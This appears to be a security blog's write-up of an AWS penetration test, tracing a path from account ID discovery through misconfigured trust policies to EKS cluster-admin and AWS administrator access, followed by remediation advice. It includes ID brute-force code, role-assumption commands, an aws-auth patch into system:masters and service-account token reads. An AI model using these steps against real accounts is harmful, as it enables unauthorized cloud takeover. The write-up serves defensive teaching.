Pentesting AWS Cloud: From AWS Account ID Discovery to EKS Cluster Admin and Beyond

A cloud red team is not merely important but critical for any organization with a cloud footprint. What started as simple AWS account enumeration ended with the Syn Cubes team finding a path to the AWS EKS cluster admin role. But there is even more...

Syn Cubes Community - January 18, 2024


Each AWS account has a unique 12-digit identifier that works like a fingerprint: it identifies the account across AWS services and is embedded within Amazon Resource Names (ARNs). AWS assigns these IDs randomly, ensuring no duplicates. Layered on top of this identifier is the Identity and Access Management (IAM) service. Think of IAM as a security gatekeeper, managing who can access your AWS resources, how they access them, and what they can do once inside.

IAM works through users and roles, which are assigned specific permissions through Identity and Access Management policies. These policies act like rules, granting access to specific AWS resources for certain users or roles.
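As an illustration, an IAM policy is a JSON document. The bucket name and permissions below are hypothetical, chosen only to show the shape of a minimal read-only policy:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::example-bucket",
        "arn:aws:s3:::example-bucket/*"
      ]
    }
  ]
}
```

The 12-digit account ID does not appear in this resource ARN, but it does appear in identity ARNs such as `arn:aws:iam::123456789012:role/example-role`, which is why leaked ARNs also leak account IDs.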

An AWS account ID is sensitive information. An attacker can, and will, try to discover valid AWS account identifiers through brute forcing or through open-source intelligence (OSINT) techniques. The brute-force technique involves adding or subtracting numbers from a known or assumed account identifier. The attacker then checks the resulting ID variations against an AWS "harmful" permission policy.
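The enumeration step can be sketched as follows. This is a minimal illustration of generating zero-padded 12-digit neighbors of a seed ID; the validation step against a permissive policy is intentionally omitted, and the seed value is a placeholder:

```shell
# Generate 12-digit AWS account ID candidates around a seed ID by
# adding/subtracting small offsets (brute-force step only; each
# candidate must still be validated separately).
seed=123456789012   # placeholder; use 10#$seed if the seed has leading zeros
radius=2
candidates=""
for offset in $(seq "-$radius" "$radius"); do
  value=$(( seed + offset ))
  # Keep only values that fit in the 12-digit account ID space.
  [ "$value" -ge 0 ] && [ "$value" -le 999999999999 ] || continue
  candidates="$candidates$(printf '%012d ' "$value")"  # keep zero padding
done
candidates="${candidates% }"
echo "$candidates"
# 123456789010 123456789011 123456789012 123456789013 123456789014
```

Each candidate would then be tested for existence before any further reconnaissance.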

Following the same strategy, combined with results gathered from OSINT queries, the team was able to discover and confirm a client's AWS account ID and an associated role, along with its assigned policy.

IAM Role "hijacked" by any user with an AWS Account

After some checks, the team noted that the AWS role tied to the previously discovered account ID had a misconfigured trust relationship policy that allowed identities from any AWS account on the internet to assume it. More precisely, the affected role granted multiple permissions to list and read IAM resources in the affected AWS account.
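For context, a trust relationship of roughly this shape (hypothetical, reconstructed only to illustrate the class of misconfiguration) allows any AWS principal to assume the role:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "AWS": "*" },
      "Action": "sts:AssumeRole"
    }
  ]
}
```

Because the principal is the wildcard `*`, any authenticated identity from any AWS account can call `sts:AssumeRole` on this role.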

To summarize:

  • An adversary following the same steps would be able to assume the role from their own AWS account. This gives them an initial foothold inside the AWS environment and lets them read and list Identity and Access Management resources, which may expose other misconfigurations that can be further abused to compromise the AWS environment. As a side effect, the attacker can also discover, from the trust relationships of various roles, other AWS accounts owned by the client.
  • The attacker would then be able to expand their scope within the targeted organization's AWS footprint. What's next?
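From an attacker's own account, assuming such a role is a single AWS CLI call. The role ARN and session name below are placeholders, not values from the engagement:

```shell
# Assume the misconfigured role cross-account (ARN is a placeholder).
aws sts assume-role \
  --role-arn arn:aws:iam::123456789012:role/misconfigured-role \
  --role-session-name recon

# Export the returned temporary credentials
# (AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN),
# then enumerate IAM with the role's read/list permissions:
aws iam list-roles
aws iam list-policies --scope Local
```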

Capture the Flag #1: Privilege Escalation to Cluster Admin

With the initial foothold established, the Syn Cubes team noticed that the client was running an Amazon EKS cluster.

The first step here was probing the EKS cluster for security misconfigurations. Reading the initial results, the team managed to escalate privileges to cluster admin by moving laterally, via a lesser-known attack vector, to a Service Account that had the "patch" permission over the "aws-auth" ConfigMap. Even though this cluster role is heavily limited in Amazon EKS, the vulnerability allows a malicious user to impersonate any Service Account of the pods running on the same worker node, regardless of namespace.

In EKS, the permission to patch ConfigMaps can lead to privilege escalation by modifying the "aws-auth" ConfigMap, which contains the mappings between AWS IAM identities and Kubernetes identities.
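To illustrate the mechanism (all ARNs and names below are placeholders), an attacker with "patch" rights can add a mapping to "aws-auth" that places an IAM role they control into the `system:masters` group:

```yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
data:
  mapRoles: |
    - rolearn: arn:aws:iam::123456789012:role/attacker-controlled-role
      username: attacker
      groups:
        - system:masters   # cluster-admin equivalent in EKS
```

Once applied (for example via `kubectl patch configmap aws-auth -n kube-system`), the attacker-controlled IAM role authenticates to the cluster as an administrator.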

Capture the Flag #2: Privilege Escalation from Pod to AWS Administrator

During the EKS configuration review, it was also noticed that an adversary would be in a position to elevate their current privileges and obtain Administrator permissions at the level of the targeted organization's AWS account.

When checking the configuration of a pod, which we will call "echo-*" for simplicity, it was found that its environment variables contained references to an AWS IAM role configured to grant AWS permissions when assumed via the AWS Web Identity feature.

By reading the service account token stored under "/var/run/secrets/" inside the "echo-*" pod, anyone can assume the "echo-role" using the AWS CLI. It turned out that this role allowed the action "sts:AssumeRole" over every other role. This is a dangerous permission, as it can be used to assume a role with higher or different permissions than the initial ones.
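A sketch of this step from inside the pod, relying on the standard environment variables that EKS injects for web identity roles (`AWS_WEB_IDENTITY_TOKEN_FILE` and `AWS_ROLE_ARN`); the session name is a placeholder:

```shell
# Read the projected service account token the pod was given.
TOKEN=$(cat "$AWS_WEB_IDENTITY_TOKEN_FILE")

# Exchange it for temporary AWS credentials for the referenced role.
aws sts assume-role-with-web-identity \
  --role-arn "$AWS_ROLE_ARN" \
  --role-session-name echo-session \
  --web-identity-token "$TOKEN"
```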

During role enumeration, we initially found a role with the AWS managed policy "AdministratorAccess" attached, which grants the highest level of access in an AWS account. We checked the trust relationship of this role within the Amazon Elastic Kubernetes Service cluster: it was a perfect candidate for the next step toward capturing this flag; however, it required an External ID. External IDs are a good security practice for mitigating the confused deputy attack.
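A trust policy that requires an External ID conditions the AssumeRole call on a shared secret. The principal and ID values below are hypothetical:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::123456789012:root" },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": { "sts:ExternalId": "example-external-id" }
      }
    }
  ]
}
```

Without the matching `--external-id` value in the `sts assume-role` call, the request is denied, which is exactly what blocked the direct path here.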

After a while, another role was found through which the External ID could be obtained by anyone on the internet with a valid AWS account. This role had a trust relationship misconfiguration in the AWS EKS environment that allowed hijacking the External ID. On top of that, the role had several other IAM permissions to list and read Identity and Access Management resources. At this point, the second flag of the Amazon Kubernetes cluster penetration test was captured.


While we decided to keep the complete details of the attack vectors private, to prevent threat actors from reproducing them against other organizations, this exercise demonstrated how a potential adversary can take advantage of several misconfigurations that are often overlooked by cloud engineers dealing with vast and complex cloud architecture patterns.

There are multiple recommendations that should be put in place to fix or mitigate most of the above:

  • Remove the action "sts:AssumeRole" or restrict it to only those roles that should be assumable by the pod. The trust relationship should be modified so that the role can be assumed only by specific pods. In a k8s cluster's security group, this can be done by enforcing a specific source IP or VPC network source. However, note that if the attacker can execute code inside a pod of the cluster, this security group mitigation can be bypassed.
  • Change the granted permissions so that they follow the least privilege principle in the Amazon Elastic Kubernetes Service cluster. Using the AWS managed policy "AdministratorAccess" is against security best practices because it can grant attackers or malicious users full control over the AWS account.
  • Change the trust relationship policy so that it allows only the Identity and Access Management identities that should indeed assume this role.
  • Reconfigure the trust relationship for the Elastic Kubernetes Service cluster so that it does not allow any AWS account on the internet to assume it.
  • Prevent pods from accessing the Metadata API. This can be done by setting the allowed hop limit of the Metadata API's responses to 1 during EKS configuration.
  • Do not deploy pods whose service accounts have high privileges on the same worker node as pods running common services like web applications, databases, and so on.
  • Analyze the need for, and limit, the permission to edit/update/patch the "aws-auth" ConfigMap to only those Service Accounts that need it.
  • Implement Instance Metadata Service version 2 across the board.
  • Use Service Control Policies to constrain the maximum permissions available to identities in the AWS accounts hosting the Amazon k8s clusters.
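The two metadata-related recommendations can be enforced on a worker node with a single AWS CLI call (the instance ID below is a placeholder). Requiring tokens enables IMDSv2 only, and a hop limit of 1 prevents the metadata response from being forwarded on to pods:

```shell
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1
```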

